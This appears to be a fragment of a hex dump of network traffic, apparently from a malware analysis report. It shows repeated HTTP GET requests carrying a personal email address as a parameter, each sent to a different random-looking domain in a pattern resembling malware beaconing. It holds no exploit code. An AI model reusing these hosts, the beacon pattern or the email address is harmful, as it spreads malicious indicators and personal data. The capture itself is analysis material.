0x00000020 (00032)   6e73616c 69736275 72793140 686f746d   nsalisbury1@hotm
0x00000030 (00048)   61696c2e 636f6d20 48545450 2f312e30   ail.com HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 6c6f636f 616e642e   ..Host: locoand.
0x00000070 (00112)   636f6d0d 0a0d0a0a 636f6d0d 0a0d0a     com.....com....

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f656d 61696c3d 6a61736f   h.php?email=jaso
0x00000020 (00032)   6e73616c 69736275 72793140 686f746d   nsalisbury1@hotm
0x00000030 (00048)   61696c2e 636f6d20 48545450 2f312e30   ail.com HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 6e65726c 65737469   ..Host: nerlesti
0x00000070 (00112)   746f7073 2e636f6d 0d0a0d0a 0a0d0a     tops.com.......

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f656d 61696c3d 6a61736f   h.php?email=jaso
0x00000020 (00032)   6e73616c 69736275 72793140 686f746d   nsalisbury1@hotm
0x00000030 (00048)   61696c2e 636f6d20 48545450 2f312e30   ail.com HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 6a6f6e64 69726574   ..Host: jondiret
0x00000070 (00112)   2e636f6d 0d0a0d0a 0d0a0d0a 0a0d0a     .com...........

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f656d 61696c3d 6a61736f   h.php?email=jaso
0x00000020 (00032)   6e73616c 69736275 72793140 686f746d   nsalisbury1@hotm
0x00000030 (00048)   61696c2e 636f6d20 48545450 2f312e30   ail.com HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 62696e65 7261742e   ..Host: binerat.
0x00000070 (00112)   636f6d0d 0a0d0a0a 0d0a0d0a 0a0d0a     com............

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f656d 61696c3d 6a61736f   h.php?email=jaso
0x00000020 (00032)   6e73616c 69736275 72793140 686f746d   nsalisbury1@hotm
0x00000030 (00048)   61696c2e 636f6d20 48545450 2f312e30   ail.com HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 6865726f 6c6f7063   ..Host: herolopc
0x00000070 (00112)   617a6572 732e636f 6d0d0a0d 0a0d0a     azers.com......

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f656d 61696c3d 6a61736f   h.php?email=jaso
0x00000020 (00032)   6e73616c 69736275 72793140 686f746d   nsalisbury1@hotm
0x00000030 (00048)   61696c2e 636f6d20 48545450 2f312e30   ail.com HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 76616461 7865722e   ..Host: vadaxer.
0x00000070 (00112)   636f6d0d 0a0d0a6f 6d0d0a0d 0a0d0a     com....om......

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f656d 61696c3d 6a61736f   h.php?email=jaso
0x00000020 (00032)   6e73616c 69736275 72793140 686f746d   nsalisbury1@hotm
0x00000030 (00048)   61696c2e 636f6d20 48545450 2f312e30   ail.com HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 666f6e74 6f726564   ..Host: fontored
0x00000070 (00112)   2e636f6d 0d0a0d0a 6d0d0a0d 0a0d0a     .com....m......

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f656d 61696c3d 6a61736f   h.php?email=jaso
0x00000020 (00032)   6e73616c 69736275 72793140 686f746d   nsalisbury1@hotm
0x00000030 (00048)   61696c2e 636f6d20 48545450 2f312e30   ail.com HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 61646572 696e6f2e   ..Host: aderino.
0x00000070 (00112)   636f6d0d 0a0d0a0a 6d0d0a0d 0a0d0a     com.....m......

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f656d 61696c3d 6a61736f   h.php?email=jaso
0x00000020 (00032)   6e73616c 69736275 72793140 686f746d   nsalisbury1@hotm
0x00000030 (00048)   61696c2e 636f6d20 48545450 2f312e30   ail.com HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 66616c61 74657265   ..Host: falatere
0x00000070 (00112)   73742e63 6f6d0d0a 0d0a0a0d 0a0d0a     st.com.........

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f656d 61696c3d 6a61736f   h.php?email=jaso
0x00000020 (00032)   6e73616c 69736275 72793140 686f746d   nsalisbury1@hotm
0x00000030 (00048)   61696c2e 636f6d20 48545450 2f312e30   ail.com HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 6b6c6573 7461722e   ..Host: klestar.
0x00000070 (00112)   636f6d0d 0a0d0a0a 0d0a0a0d 0a0d0a     com............

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f656d 61696c3d 6a61736f   h.php?email=jaso
0x00000020 (00032)   6e73616c 69736275 72793140 686f746d   nsalisbury1@hotm
0x00000030 (00048)   61696c2e 636f6d20 48545450 2f312e30   ail.com HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 6d69616e 61662e63   ..Host: mianaf.c
0x00000070 (00112)   6f6d0d0a 0d0a0a0a 0d0a0a0d 0a0d0a     om.............

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f656d 61696c3d 6a61736f   h.php?email=jaso
0x00000020 (00032)   6e73616c 69736275 72793140 686f746d   nsalisbury1@hotm
0x00000030 (00048)   61696c2e 636f6d20 48545450 2f312e30   ail.com HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 6e61696d 6965642e   ..Host: naimied.
0x00000070 (00112)   636f6d0d 0a0d0a0a 0d0a0a0d 0a0d0a     com............

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f656d 61696c3d 6a61736f   h.php?email=jaso
0x00000020 (00032)   6e73616c 69736275 72793140 686f746d   nsalisbury1@hotm
0x00000030 (00048)   61696c2e 636f6d20 48545450 2f312e30   ail.com HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 64656e67 6f646172   ..Host: dengodar
0x00000070 (00112)   2e636f6d 0d0a0d0a 0d0a0a0d 0a0d0a     .com...........

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f656d 61696c3d 6a61736f   h.php?email=jaso
0x00000020 (00032)   6e73616c 69736275 72793140 686f746d   nsalisbury1@hotm
0x00000030 (00048)   61696c2e 636f6d20 48545450 2f312e30   ail.com HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 62657a65 64657465   ..Host: bezedete
0x00000070 (00112)   2e636f6d 0d0a0d0a 0d0a0a0d 0a0d0a     .com...........


Strings